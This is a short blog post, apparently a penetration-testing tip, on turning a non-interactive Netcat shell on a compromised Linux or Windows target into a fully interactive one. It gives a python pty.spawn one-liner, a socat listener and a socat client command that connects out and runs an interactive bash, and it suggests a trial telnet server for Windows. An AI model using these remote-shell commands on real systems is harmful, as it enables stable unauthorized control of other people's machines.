From a non interactive shell to an interactive one

As you can read at the end of this post a remote shell using command execution (-e cmd.exe or /bin/bash) isn’t a full interactive command prompt.
These are solutions I found to have a more stable shell. Note that I don’t talk about a web remote shell as c99, c100, weevely or other php/asp code that need a web server. Also I don’t want to talk about MSFvenom and similar, but I focused on something similar to NC or SSH.

The target is a Linux system.
Using Pyton:
After you get a Netcat remote shell execute

python -c 'import pty; pty.spawn("/bin/bash");'

This is non completly interactive, but is better than before.

Is Better to use socat that is a more complex variant of netcat.
Listener:

socat file:`tty`,raw,echo=0 tcp-listen:8999

Client:

socat tcp:127.0.0.1:8999 exec:"bash -li",pty,stderr,setsid,sigint,sane

This is a full interactive remote shell

The target is a Windows system.
I suppose that in Microsoft environment you don’t have pyton or socat, although the two programs have Windows binary.
So the better way I found is to start a telnet server. Googling I found some stand alone programs like TelnetD. Note that isn’t a free software, but you can try it using the Trial Version.

Leave a Reply

Your email address will not be published.